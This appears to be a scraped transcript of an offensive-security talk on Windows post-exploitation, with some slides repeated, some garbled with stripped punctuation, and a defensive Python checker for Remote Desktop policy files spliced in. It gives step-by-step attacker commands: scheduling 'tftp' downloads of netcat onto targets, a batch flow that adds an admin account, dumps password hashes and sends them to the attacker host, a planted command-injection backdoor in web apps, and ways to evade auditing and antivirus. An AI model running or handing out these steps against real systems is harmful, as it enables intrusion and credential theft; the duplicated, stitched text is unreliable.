    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
    "fDenyTSConnections"=dword:00000000
    "TSEnabled"=dword:00000001
    "TSUserEnabled"=dword:00000000

  – Then perform these commands
    • sc config termservice start= auto
    • regedit /s enable_ts.reg
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\newsecedit.sdb
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\origsecedit.sdb
    • secedit /configure /db newsecedit.sdb /cfg fix_ts_policy.ini
    • gpupdate /force
    • net start "terminal services"
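Both files above are plain text, so a reviewer can diff what they would do against the approved Remote Desktop policy before (or after) they land on a host. The checker below is an added defensive example, not code from the talk: it parses the .reg and secedit .ini formats shown on slides 53 and 54 and reports every change that widens Remote Desktop exposure. The approved-principal set (here the Remote Desktop Users well-known SID) is an assumption.

```python
import re

# Constructed copies of the two files the slides describe, as they might be
# found on a reviewed host (contents taken from slides 53 and 54).
ENABLE_TS_REG = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
"""

FIX_TS_POLICY_INI = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
"""

TS_KEY = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server"
LOGON_GRANTS = ("seremoteinteractivelogonright", "seinteractivelogonright")
LOGON_DENIES = ("sedenyinteractivelogonright",
                "sedenyremoteinteractivelogonright",
                "sedenynetworklogonright")


def parse_reg(text):
    """Minimal .reg parser: {key: {value_name: value}}. Handles dword: and
    quoted strings, which is all the slide's file uses."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = re.match(r'^"([^"]+)"=(.*)$', line)
        if m and current is not None:
            name, data = m.groups()
            if data.lower().startswith("dword:"):
                keys[current][name] = int(data[6:], 16)
            else:
                keys[current][name] = data.strip('"')
    return keys


def parse_inf(text):
    """Minimal secedit .inf/.ini parser: {section: {key: value}}.
    Keys are lower-cased; an empty value is kept as '' so that a cleared
    right is distinguishable from an absent one."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections


def review_ts_changes(reg_text, inf_text, approved_accounts):
    """List the ways these two files widen Remote Desktop exposure.
    `approved_accounts` holds the principals allowed remote interactive
    logon by policy (a constructed assumption for this example)."""
    findings = []
    ts = parse_reg(reg_text).get(TS_KEY, {})
    if ts.get("fDenyTSConnections") == 0:
        findings.append("registry: fDenyTSConnections=0 allows Terminal Server connections")
    if ts.get("TSEnabled") == 1:
        findings.append("registry: TSEnabled=1 turns the Terminal Server listener on")
    rights = parse_inf(inf_text).get("Privilege Rights", {})
    for right in LOGON_GRANTS:
        for who in (a.strip() for a in rights.get(right, "").split(",")):
            if who and who not in approved_accounts:
                findings.append(f"policy: {right} granted to unapproved principal {who}")
    for right in LOGON_DENIES:
        if right in rights and rights[right] == "":
            findings.append(f"policy: {right} cleared, removing an existing deny")
    return findings


if __name__ == "__main__":
    # S-1-5-32-555 is the well-known SID of BUILTIN\Remote Desktop Users
    for finding in review_ts_changes(ENABLE_TS_REG, FIX_TS_POLICY_INI, {"*S-1-5-32-555"}):
        print(finding)
```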

Slide 55

• DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

• Oldschool techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• AT command schedules things to run at a specified time and date
  – Schedule service must be running

Slide 58

Abusing The Scheduler

• Often these days certain features are disabled for security
  – Clipbook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled

    net use \\target\ipc$ password /user:username
    at \\target 12:00 pm command
    Ex: at \\192.168.1.1 12:00pm "tftp -i myip GET nc.exe"

Slide 59

Abusing The Scheduler

• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
  – Enable / Start Services
  – Transfer files
  – Adding users
  – Messing with the registry / policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 11: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 11

Password Management Stages amp Techniques

ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing

ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact

Slide 12

Manual Password Management

bull Existing Toolsndash L0phtCrack

bull Stores passwords in session filesndash CainampAbel

bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)

ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability

ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable

Slide 13

Slide 14

bull MetaPassbull Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 26

Persistence

bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form

fieldsndash If Name = John Smith and Age = 42 then execute

contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to

find

Slide 27

Persistence

bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation

Slide 28

Persistence

bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access

bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)

bull Only use AT to run your commandsbull Persistence without adding files new accounts

ndash Unlikely to be discovered

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

• Automating techniques and tools for use against massive numbers of hosts
• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use / re-use
  – Lower cost of attack

Slide 65

Massive Automation

• MassNetUse – Establish netbios session/credentials on a range of hosts
• MassWinenum – Enumerate Netbios information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts

Slide 66

• DEMOS

Slide 67

• Related talks you should see
  – Beyond EIP – The theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)

Slide 68

• Acknowledgements
  – Thanks to:
    • All the people from offensivecomputing, nologin, uninformed IRC and SILC channels
    • HD Moore especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work

Slide 69

• Questions?
• Presentation available at www.offensivecomputing.net


Slide 12

Manual Password Management

• Existing Tools
  – L0phtCrack
    • Stores passwords in session files
  – Cain & Abel
    • Static table, difficult to export/use/automate
    • Password Classification (NTLM, Cisco, SQL, md5)
  – Core Impact
    • Good for automated reuse of passwords against many hosts
    • No real storage/management capability
  – Text file / John the Ripper
    • Many people's method
    • Quick and dirty, not easily scalable

Slide 13

Slide 14

• MetaPass
• Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

– In the old days a rootkit helped you maintain root
– Today rootkits are all about hiding
– These two concepts still go hand in hand

Slide 17

Persistence

• Persistence is maintaining access
• Why?
  – Targets can get patched
  – Some exploits are 1 shot only
  – Sometimes you need to return multiple times to the target
  – Target's usefulness not always immediately known
• Goals: Access target as often as needed/useful
• Huge area of study
• Sometimes persistence doesn't matter

Slide 18

Persistence

• Stages of Persistence
  – Initial access
    • Exploit
    • Stolen password, etc.
  – Decisions: What tool to use
    • FUZZY – OS, environment, target dependent
  – Setup
  – Re-accessing of target
  – Cleanup: Don't be a slob, it will get you caught
    • When you no longer need the target, leave no trace

Slide 19

Persistence

• Existing tools
  – Rootkits
  – Backdoors
  – Trojans
  – Port knockers
  – Adding accounts
  – Things like netcat backdoors, inetd modifications, process injection, stealing credentials, etc.

Slide 20

Persistence

• Different perspective on persistence
  – If you can always re-exploit, who cares?
  – Inject/add/modify new vulnerabilities
    • Hard to determine maliciousness
    • We all know it's hard to find bugs now; imagine someone is purposefully putting the bugs in

Slide 21

Persistence

• Leveraging existing persistent admin access
  • Nagios checks
  • Attack Configuration Management
    – Cfengine
    – SMS
    – Automated Patching Systems ("patch" them with our trojans)
  • GUIs
  • Tool distribution

Slide 22

Persistence

• Example
  • Machine has VNC installed
  • Replace installed VNC with vulnerable version
    – Authentication bypass
  • Copy registry password so target doesn't realize
  • Persistence with no backdoors or rootkits to get detected

Slide 23

Persistence

• Add vulnerable code
• Example: web apps
  – Take out user input validation
  – Inject your vulnerable code
• Focus on vague intent
• Never be obviously and solely malicious
  – Look for apps with previous vulnerabilities
  – Re-introduce patched bugs

Slide 24

Persistence

• More web app examples
• Add hidden field to HTML form
  – Users detect no change, app performs normally
    <input type="hidden" name="Lang">
• Edit web app and tie vuln perl code to form field input
    if defined $hidden_field open($filename, ">$hidden_field")
• Craft a POST including the hidden field

Slide 25

Persistence

• www.target.com/cgi-bin/app.cgi?lang=|cmd|
• Code will execute your commands
• Who needs to bind a shell to a port?
• Unlikely to ever be detected
  – Especially good in big apps
  – Code review can't even be sure of maliciousness
  – Some sites replace code every X time period
• No rootkits to install
• Tripwire probably won't see this

Slide 26

Persistence

• Take concept to another level
  – Add a decoder to web app
  – Look for a "trigger" string combination in form fields
  – If Name = John Smith and Age = 42 then execute contents of Address field
  – URL encode form entries containing commands
  – Have identifier "stub" in encoded data for app to find

Slide 27

Persistence

• Mixing Stealth with Persistence
  – Further encoding
  – Take entries from all fields
  – Concat them
  – "Decode" commands
  – Rotational ciphers (rot13, Caesar)
  – Even more complex obfuscation

Slide 28

Persistence

• Covert Accounts
  – Add an account / re-enable
  – Modify local account policies to allow access
    • Ex: SUPPORT_3848576b1, guest
  – Add it to the admin group (net localgroup)
• Only use AT to run your commands
• Persistence without adding files / new accounts
  – Unlikely to be discovered

Slide 29

• DEMOS

Slide 30

Stealth / Evading Detection

Slide 31

Stealth / Evading Detection

• Hiding your activity
  – From:
    • IDS
    • AV
    • LOGGING
    • Suspicious users & admins
    • Firewalls
    • Process listing

Slide 32

Stealth / Evading Detection

• Why Stealth?
  – If you get caught you get stopped
  – The longer you can operate undetected, the more you can accomplish
  – Admins won't fix problems they don't know exist (helps persistence)
  – On a pen test you should also be testing the organization's detection and response capabilities

Slide 33

Stealth / Evading Detection

• Goals
  – Keep system operable
    • If it breaks you can't use it
    • Someone will come fix it
  – Operate without fear of detection
  – Robustness
    • Hiding shouldn't require constant attention
  – DON'T LOOK MALICIOUS

Slide 34

Stealth / Evading Detection

• Manual / Existing Tools
  – Rootkits, rootkits, rootkits
  – Meterpreter
  – Encryption
    • Shellcode encoders for IDS evasion
  – Log cleaners
  – Packers
  – Covert channels / Steganography
  – Anti-analysis / anti-forensics
• See all of OC's other talks
• Also Vinnie Liu's Metasploit research

Slide 35

Stealth / Evading Detection

• Different Perspective
  – DON'T BE AN ANOMALY
  – Hide in plain sight
    • Many tools have ONLY malicious uses
    • Make your intent hard to determine
  – Be noisy on one to divert attention from another

Slide 36

Stealth / Evading Detection

• Different Perspective
  – Know the target's environment better than they do
    • If they don't use encryption, maybe you shouldn't either
    • Change strategies to match the environment's normal behavior
  – Don't always default to exploits
    • See Tactical Exploitation talk
    • IDSs can't see normal behavior that is malicious

Slide 37

Stealth / Evading Detection

• Using Windows security objects for stealth
  – Auditing of securable objects is controlled by SACLs
  – Null SACL = No Auditing = No Logs

Slide 38

• DEMOS
  – Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

• It's not always about ROOT
• Look like someone else
  – Use the credentials/access of another user
• Goals
  – Change your identity at will
    • User ID, domain credentials, sessions
    • Impersonate system accounts
    • Make activities look like normal user behavior

Slide 41

User Identity Theft

• Stages and techniques
  – Target users
    • Who has access to what
    • Where is the data
  – Change identity
    • Hijack credentials/sessions
    • Abuse tokens
  – Access is the end goal, be it data or another system

Slide 42

User Identity Theft

• Existing tools
  – Incognito (metasploit)
    • Enumerate/hijack tokens
  – FU/FUTo
    • Enable SYSTEM privileges
    • Change process privileges/DKOM
  – SU, SUDO, KSU
  – Process injection
  – Hijack domain credentials

Slide 43

User Identity Theft

Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs, Oh My!

• What we want
  – Privileges or SIDs
• What we get
  – Access, Access, Access
• How we get it
  – Incognito vs FUTo

Slide 44

• DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

• Changing existing features or settings to benefit our activities
• Goals
  – Support all post-exploitation activities
  – Disabling detection technologies
  – Enabling insecure or easy-to-use access software

Slide 47

Feature Modification

• Feature modification is basically securable object manipulation
  – Remember all those tokens and security descriptors?
  – These can be modified programmatically and directly
    • Not just through existing tools
  – Stealth/persistence requirements
    • May make it more advantageous to use custom tools
  – Access objects programmatically
  – Can be much more complex to implement

Slide 48

Feature Modification

• Re-enabling disabled access
  – PsExec: It's still cool (Thanks Mark)
• Enabling GUI access
  – VNC (from a command line)
  – Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
  – Firewalls, AV, logging
• Modifying Local Security Policies

Slide 49

Feature Modification

• Enabling psexec
  – Psexec was a great/awesome remote shell/command tool
  – Everybody now disables clipbook, which psexec requires, l4m3
  – Let's re-enable it

Slide 50

Feature Modification

• Enabling psexec
• Use the system control tool sc.exe
  – net use \\target\ipc$ username /user:password
  – sc \\target config netdde start= auto
  – sc \\target config netddedsdm start= auto
  – sc \\target config clipsrv start= auto
  – sc \\target start netdde
  – sc \\target start netddedsdm
  – sc \\target start clipsrv

Slide 51

Feature Modification

• Enabling VNC (from command line)
  – Go get VNC (check out guh.nu)
  – Make a folder on the target for the vnc files
  – Copy the following files to target folder
    • winvnc.exe
    • vnc.reg
    • vnchooks.dll
    • omnithread_rt.dll
  – regedit -s vnc.reg
  – winvnc -install
  – net start "vnc server"
  – winvnc
  – Password is "infected"

vnc.reg file contents:

  [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
  "SocketConnect"=dword:00000001
  "AutoPortSelect"=dword:00000001
  "InputsEnabled"=dword:00000001
  "LocalInputsDisabled"=dword:00000000
  "IdleTimeout"=dword:00000000
  "QuerySetting"=dword:00000002
  "QueryTimeout"=dword:0000000a
  "PollUnderCursor"=dword:00000000
  "PollForeground"=dword:00000001
  "PollFullScreen"=dword:00000000
  "OnlyPollConsole"=dword:00000001
  "OnlyPollOnEvent"=dword:00000000
  "Password"=hex:10,4d,89,3d,5a,e1,55,f8

Slide 52

Feature Modification

• Enabling Remote Desktop remotely
  – Having a GUI to your target can be necessary
  – Maybe they are running a specialized GUI app
    • Ex: System controlling access to security doors
      – No command line way of modifying system, need GUI
    • SCADA systems
    • Security cameras
    • Who knows what you might be up to
  – Remote desktop is fast and already a feature of the OS
  – However it's often disabled, maybe even by GPO

Slide 53

Feature Modification

• Enabling Remote Desktop remotely
  – Complicated procedure, especially if GPOs are involved
  – Create a file named fix_ts_policy.ini:

  [Unicode]
  Unicode=yes
  [Version]
  signature="$CHICAGO$"
  Revision=1
  [Privilege Rights]
  seremoteinteractivelogonright = hacked_account
  seinteractivelogonright = hacked_account
  sedenyinteractivelogonright =
  sedenyremoteinteractivelogonright =
  sedenynetworklogonright =

  – This file will fix policy settings in your way
  – Change "hacked_account" to a real account

Slide 54

Feature Modification

• Enabling Remote Desktop remotely
  – Create another file named enable_ts.reg:

  Windows Registry Editor Version 5.00

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
  "fDenyTSConnections"=dword:00000000
  "TSEnabled"=dword:00000001
  "TSUserEnabled"=dword:00000000

  – Then perform these commands
    • sc config termservice start= auto
    • regedit /s enable_ts.reg
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
    • secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
    • gpupdate /Force
    • net start "terminal services"

Slide 55

• DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

